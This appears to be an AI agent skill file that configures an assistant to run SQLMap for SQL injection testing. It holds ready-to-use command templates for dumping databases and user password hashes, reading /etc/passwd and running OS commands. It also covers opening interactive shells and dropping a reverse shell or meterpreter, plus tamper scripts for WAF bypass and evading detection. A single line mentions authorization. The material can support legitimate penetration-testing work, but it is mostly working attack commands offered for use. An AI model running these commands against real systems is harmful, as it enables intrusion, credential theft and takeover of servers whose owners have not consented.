Hacktricks-skills sqlmap-assistant
SQLMap automation and SQL injection testing assistant. Use this skill whenever the user needs to test for SQL injection vulnerabilities, run SQLMap commands, extract database information, or perform web application security testing. Trigger on mentions of SQLMap, SQL injection, database exploitation, web security testing, penetration testing, or any request to audit web applications for database vulnerabilities.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/pentesting-web/sql-injection/sqlmap/sqlmap/SKILL.MDsource content
SQLMap Assistant
A skill for automating SQL injection testing with SQLMap, generating commands, and guiding security assessments.
When to Use This Skill
Use this skill when:
- The user wants to test a web application for SQL injection vulnerabilities
- They need SQLMap command templates for specific scenarios
- They're doing penetration testing or security assessments
- They need help extracting database information from vulnerable applications
- They want to understand SQL injection techniques and payloads
- They're working with Burp Suite/ZAP captures for SQL injection testing
Quick Start
Basic SQLMap Command Template
sqlmap -u "<URL>" -p "<PARAMETER>" --batch --random-agent --threads=10 --level=5 --risk=3
From Request File (Burp/ZAP)
sqlmap -r <request_file.txt> --batch --random-agent
Common Testing Scenarios
1. GET Parameter Injection
sqlmap -u "http://target.com/page.php?id=1" -p id --batch
2. POST Data Injection
sqlmap -u "http://target.com/login" --data "username=admin&password=test" --batch
3. Cookie Injection
sqlmap -u "http://target.com" --cookie "session=abc123" --batch
4. Header Injection
sqlmap -u "http://target.com" --headers="X-Forwarded-For:127.0.0.1" --batch
5. Custom HTTP Method
sqlmap --method=PUT -u "http://target.com/api" --headers="X-Custom-Header:*" --batch
Data Extraction Commands
Enumerate Databases
# List all databases sqlmap -u "<URL>" -p "<PARAM>" --dbs --batch # List tables in a specific database sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> --tables --batch # List columns in a table sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> -T <table_name> --columns --batch # Dump all data from a table sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> -T <table_name> --dump --batch # Dump specific columns sqlmap -u "<URL>" -p "<PARAM>" -D <database_name> -T <table_name> -C <column1,column2> --dump --batch
Extract User Information
# Get current database user sqlmap -u "<URL>" -p "<PARAM>" --current-user --batch # Check if user is DBA sqlmap -u "<URL>" -p "<PARAM>" --is-dba --batch # Get all usernames sqlmap -u "<URL>" -p "<PARAM>" --users --batch # Get user passwords sqlmap -u "<URL>" -p "<PARAM>" --passwords --batch # Get user privileges sqlmap -u "<URL>" -p "<PARAM>" --privileges --batch # Get system hostname sqlmap -u "<URL>" -p "<PARAM>" --hostname --batch
Dump Everything
sqlmap -u "<URL>" -p "<PARAM>" --all --batch
Advanced Techniques
Force Specific Injection Techniques
# Use only UNION and Time-based blind (in that order) sqlmap -u "<URL>" -p "<PARAM>" --technique="UT" --batch # Use only Boolean-based blind sqlmap -u "<URL>" -p "<PARAM>" --technique="B" --batch # Use only Error-based sqlmap -u "<URL>" -p "<PARAM>" --technique="E" --batch
Technique Reference:
| Letter | Technique | Description |
|---|---|---|
| B | Boolean-based blind | True/false conditions in response |
| E | Error-based | DBMS error messages |
| U | UNION query | UNION SELECT statements |
| S | Stacked queries | Multiple SQL statements |
| T | Time-based blind | SLEEP/WAITFOR delays |
| Q | Out-of-band | DNS exfiltration, LOAD_FILE() |
Custom Prefix/Suffix
# Add prefix to injection point sqlmap -u "<URL>" -p "<PARAM>" --prefix="') " --batch # Add suffix to injection point sqlmap -u "<URL>" -p "<PARAM>" --suffix="-- " --batch # Both prefix and suffix sqlmap -u "<URL>" -p "<PARAM>" --prefix="') " --suffix="-- " --batch
Tamper Scripts (WAF Bypass)
# Use a tamper script sqlmap -u "<URL>" -p "<PARAM>" --tamper=apostrophemask.py --batch # Multiple tampers sqlmap -u "<URL>" -p "<PARAM>" --tamper=apostrophemask.py,base64encode.py --batch
Common Tamper Scripts:
- Replaces apostrophe with UTF-8 full widthapostrophemask.py
- Base64 encodes payloadbase64encode.py
- Double URL-encodeschardoubleencode.py
- Replaces spaces with commentsspace2comment.py
- Random case for keywordsrandomcase.py
- UNION ALL to UNIONunionalltounion.py
- MySQL versioned commentsversionedkeywords.py
Second Order Injection
sqlmap -r <request_file.txt> --dbms MySQL --second-order "http://target.com/reflective_page" --batch
Custom String Detection
# Trigger when this string appears sqlmap -u "<URL>" -p "<PARAM>" --string="success" --batch # Trigger when this string does NOT appear sqlmap -u "<URL>" -p "<PARAM>" --not-string="error" --batch
System Access
Execute OS Commands
# Run a specific command sqlmap -u "<URL>" -p "<PARAM>" --os-cmd="whoami" --batch # Interactive OS shell sqlmap -u "<URL>" -p "<PARAM>" --os-shell --batch # Drop reverse shell/meterpreter sqlmap -u "<URL>" -p "<PARAM>" --os-pwn --batch
Read Files
sqlmap -u "<URL>" -p "<PARAM>" --file-read=/etc/passwd --batch
Crawl and Auto-Exploit
sqlmap -u "http://target.com/" --crawl=1 --forms --random-agent --batch --threads=5 --level=5 --risk=3
Authentication Support
# HTTP Basic Auth sqlmap -u "<URL>" -p "<PARAM>" --auth-type=Basic --auth-cred="user:pass" --batch # HTTP Digest Auth sqlmap -u "<URL>" -p "<PARAM>" --auth-type=Digest --auth-cred="user:pass" --batch # HTTP NTLM Auth sqlmap -u "<URL>" -p "<PARAM>" --auth-type=NTLM --auth-cred="user:pass" --batch
Proxy Configuration
# Use Burp Suite proxy sqlmap -u "<URL>" -p "<PARAM>" --proxy=http://127.0.0.1:8080 --batch # Use other proxy sqlmap -u "<URL>" -p "<PARAM>" --proxy=http://proxy.example.com:8080 --batch
Performance and Aggression
# Maximum level and risk (aggressive) sqlmap -u "<URL>" -p "<PARAM>" --level=5 --risk=3 --batch # Increase threads sqlmap -u "<URL>" -p "<PARAM>" --threads=10 --batch # Random user agent sqlmap -u "<URL>" -p "<PARAM>" --random-agent --batch # Custom user agent sqlmap -u "<URL>" -p "<PARAM>" --user-agent="Mozilla/5.0" --batch
Known Database and OS
# Specify known DBMS sqlmap -u "<URL>" -p "<PARAM>" --dbms=MySQL --batch # Specify known OS sqlmap -u "<URL>" -p "<PARAM>" --os=Linux --batch
Python Eval (Advanced)
# Process payload with Python before sending sqlmap -u "<URL>" -p "<PARAM>" --eval "<python_code>" --batch
Workflow Guide
Step 1: Initial Reconnaissance
- Identify the target URL and parameters
- Capture requests with Burp Suite or ZAP if needed
- Start with basic detection:
sqlmap -u "<URL>" -p "<PARAM>" --batch --random-agent
Step 2: Confirm Vulnerability
- If detected, enumerate databases:
sqlmap -u "<URL>" -p "<PARAM>" --dbs --batch
Step 3: Extract Data
- List tables and columns
- Dump sensitive data (usernames, passwords, etc.)
- Check for system access capabilities
Step 4: Escalation (if applicable)
- Try OS command execution
- Attempt file reading
- Consider reverse shell if appropriate
Important Notes
- Always have authorization before testing any system
- Use
for non-interactive mode (accepts defaults)--batch - Start with lower
and--level
values, increase if needed--risk - Use
to avoid detection--random-agent - Consider using a proxy (Burp Suite) for request inspection
- Document findings for reporting
Common Issues and Solutions
SQLMap Doesn't Detect Injection
- Try different techniques:
or--technique="B"--technique="T" - Add prefix/suffix:
--prefix="') " --suffix="-- " - Use tamper scripts:
--tamper=apostrophemask.py - Force detection:
--technique="BEUSTQ"
WAF Blocking Requests
- Use tamper scripts
- Slow down with fewer threads
- Use proxy to inspect and modify requests
- Try different user agents
Slow Performance
- Increase threads:
--threads=10 - Specify known DBMS:
--dbms=MySQL - Use
to skip prompts--batch